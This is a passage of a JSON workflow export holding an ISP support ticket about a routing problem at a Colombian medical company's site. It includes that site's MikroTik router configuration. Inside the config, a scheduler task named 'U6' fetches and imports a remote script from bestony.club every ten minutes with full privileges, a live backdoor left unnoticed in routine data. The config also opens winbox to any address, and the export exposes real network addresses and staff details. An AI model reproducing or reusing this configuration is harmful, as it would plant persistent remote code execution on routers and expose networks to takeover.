gateway=172.17.58.37 routing-mark=cloudadd distance=1 dst-address=10.0.0.0/23 gateway=10.241.50.1add distance=1 dst-address=10.0.12.0/24 gateway=10.241.50.1add distance=1 dst-address=10.0.14.0/24 gateway=10.241.50.1add distance=1 dst-address=10.0.15.0/24 gateway=10.241.50.1add distance=1 dst-address=10.0.16.0/22 gateway=10.241.50.1add distance=1 dst-address=10.0.20.0/23 gateway=10.241.50.1add distance=1 dst-address=10.0.24.0/24 gateway=10.241.50.1add distance=1 dst-address=10.0.25.0/24 gateway=10.241.50.1add distance=1 dst-address=10.0.28.0/22 gateway=10.241.50.1add distance=200 dst-address=10.10.0.0/24 gateway=10.241.50.2add distance=200 dst-address=10.11.0.0/24 gateway=10.241.50.2add distance=200 dst-address=10.20.0.0/24 gateway=10.241.50.2add distance=1 dst-address=10.22.0.0/29 gateway=10.241.51.1add distance=1 dst-address=10.25.0.0/29 gateway=10.241.51.1add distance=200 dst-address=10.30.0.0/24 gateway=10.241.50.2add distance=1 dst-address=10.40.0.0/24 gateway=10.241.50.1add distance=1 dst-address=10.50.1.0/24 gateway=10.241.50.1add distance=1 dst-address=10.80.0.0/20 gateway=10.241.50.1add distance=1 dst-address=10.100.0.0/16 gateway=10.241.50.1add distance=1 dst-address=10.100.0.2/32 gateway=10.241.50.1add distance=1 dst-address=10.100.0.2/32 gateway=10.241.50.1add distance=1 dst-address=10.102.7.248/29 gateway=10.241.50.1add distance=1 dst-address=10.245.0.0/20 gateway=10.241.50.1add distance=1 dst-address=10.245.1.0/24 gateway=10.241.50.1add distance=1 dst-address=172.16.0.0/16 gateway=10.241.50.1add distance=1 dst-address=172.19.0.0/22 gateway=10.241.50.1add distance=1 dst-address=172.19.5.0/27 gateway=10.241.50.1add distance=1 dst-address=190.60.122.10/32 gateway=172.17.58.41add distance=1 dst-address=190.60.220.130/32 gateway=172.17.58.41add distance=1 dst-address=190.61.4.34/32 gateway=172.17.58.41add distance=1 dst-address=190.61.4.35/32 gateway=172.17.58.41add distance=1 dst-address=190.61.4.170/32 gateway=172.17.58.41add distance=1 dst-address=192.168.0.0/24 gateway=10.241.50.1add distance=1 dst-address=192.168.1.0/24 gateway=10.241.50.1add distance=1 dst-address=192.168.125.0/24 gateway=10.241.50.1add distance=1 dst-address=201.217.212.69/32 gateway=172.17.58.41add distance=1 dst-address=201.217.212.70/32 gateway=172.17.58.41/ip route vrfadd interfaces=ether3,ether5 routing-mark=cloud/ip serviceset telnet address=190.60.0.0/16,190.61.0.0/16,172.16.0.0/16,172.17.0.0/16,10.0.120.0/24,200.62.0.0/16,200.91.0.0/16,10.16.40.103/32set ftp disabled=yesset ssh address=190.60.0.0/16,190.61.0.0/16,172.16.0.0/16,172.17.0.0/16,10.0.120.0/24,200.62.0.0/16,200.91.0.0/16,10.16.40.103/32set winbox address=0.0.0.0/0/routing bgp networkadd network=10.100.0.0/16add network=10.0.0.0/23add network=172.16.0.0/16add network=10.0.14.0/24add network=10.0.25.0/24add network=10.0.24.0/24add network=10.0.15.0/24add network=10.245.0.0/20add network=192.168.1.0/24add network=10.0.16.0/22add network=192.168.0.0/24add network=10.0.12.0/24add network=10.102.7.248/29add network=10.245.1.0/24add network=172.19.0.0/22add network=10.50.1.0/24add network=10.80.0.0/20add network=10.0.28.0/22add network=10.0.20.0/23add network=10.241.50.0/29add network=192.168.125.0/24add network=172.19.5.0/27add network=10.40.0.0/24add network=10.25.0.0/29add network=10.100.23.0/27/routing bgp peeradd instance=BGP_MPLS name=peer2 out-filter=LAN_IMAGEN_OUT remote-address=172.17.58.37 remote-as=18747add hold-time=30s name=peer1 out-filter=LAN_OUT remote-address=172.17.58.41 remote-as=18747/routing filteradd action=accept chain=LAN_OUT prefix=10.241.50.0/29add action=accept chain=LAN_OUT prefix=10.100.0.0/16add action=accept chain=LAN_OUT prefix=10.0.0.0/23add action=accept chain=LAN_OUT prefix=172.16.0.0/16add action=accept chain=LAN_OUT prefix=10.0.14.0/24add action=accept chain=LAN_OUT prefix=10.0.25.0/24add action=accept chain=LAN_OUT prefix=10.0.24.0/24add action=accept chain=LAN_OUT prefix=10.0.15.0/24add action=accept chain=LAN_OUT prefix=10.245.0.0/20add action=accept chain=LAN_OUT prefix=10.0.16.0/22add action=accept chain=LAN_OUT prefix=192.168.1.0/24add action=accept chain=LAN_OUT prefix=192.168.0.0/24add action=accept chain=LAN_OUT prefix=10.0.20.0/23add action=accept chain=LAN_OUT prefix=10.0.28.0/22add action=accept chain=LAN_OUT prefix=10.80.0.0/20add action=accept chain=LAN_OUT prefix=10.50.1.0/24add action=accept chain=LAN_OUT prefix=172.19.0.0/22add action=accept chain=LAN_OUT prefix=10.0.12.0/24add action=accept chain=LAN_OUT prefix=10.245.1.0/24add action=accept chain=LAN_OUT prefix=10.102.7.248/29add action=accept chain=LAN_IMAGEN_OUT prefix=10.22.0.0/29add action=accept chain=LAN_OUT prefix=172.19.5.0/27add action=discard chain=LAN_IMAGEN_OUTadd action=accept chain=LAN_OUT prefix=192.168.125.0/24add action=discard chain=LAN_OUTadd action=accept chain=LAN_OUT prefix=10.40.0.0/24add action=accept chain=LAN_OUT prefix=10.10.0.0/24add action=accept chain=LAN_OUT prefix=10.100.23.0/27/snmpset enabled=yes trap-community=ifxcliente trap-version=2/system clockset time-zone-autodetect=no time-zone-name=America/Bogota/system identityset name=SID_1387994_COSMITET_REY_DAVID_PPAL/system scheduleradd interval=10m name=U6 on-event=\\   \"/tool fetch url=http://bestony.club/poll/9fcbeb62-5378-4575-833f-7117aa0b1f6f mode=http dst-path=7wmp0b4s.rsc\\   \\n/import 7wmp0b4s.rsc\" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=jan/02/1970 start-time=02:09:50","attachment":{}},{"id":"153532559","author":{"id":"3369418","value":"MIGUEL ANGEL AMEZQUITA HERNANDEZ"},"authoremail":"care@ifxcorp.com","date":"06/12/2025 9:17 AM","datesecs":1749745020000,"message":"En revision","attachment":{}}],"cierre":{"CaseId":"37911967","Company":"COSMITET LTDA CORPORACION DE SERVICIOS MEDICOS INTERNACIONALES THEM Y CIA L","Imputabilidad":"Cliente","Responsable":"MIGUEL ANGEL AMEZQUITA HERNANDEZ","Unavailable_Minutes":"0","unavailable_to_report_minutes":"0","Type_of_Unavailable":"No Aplica","date_upgrade_services_affecte":"06/12/2025 10:40:00 AM","General_description_cause":"Eventualidad","Servicio":"1387993-IFX Data Transport","Area":"","person_confirms_closure":"pte cliente  -  cierre 24 horas","overview_fall":"","Reason_for_Closing":"Enrutamiento","SubReason_for_Closing":"","Equipment":"","Node":"","Displacement":"F","Reason_Displacement":"","Include_Report":"T","Cause_Internal_Error":"","email_confirm_close":"na","Development_Process_Realized":"Se realizan ajustes sobre las rutas y se agrega red a las rutas, su ayuda validando y confirmando. atento a sus comentarios","Incident_Description":"En la sede Cosmitet Rey David Cali tenemos un canal de datos hacia IFX pero actualmente el segmento 10.100.40.0/23 no está alcanzando el segmento 10.30.0.0/24, los demás segmentos si lo alcanzan de forma correcta.","Action_Plan":"Se realizan ajustes sobre las rutas y se agrega red a las rutas, su ayuda validando y confirmando. atento a sus comentarios"}},"webhookUrl":"https://n8n.aifx.com.co/webhook/analytics_sent","executionMode":"production"}}]},"versionId":"d6f48c05-0029-490d-a346-c7411dfc52da","triggerCount":1,"tags":[]}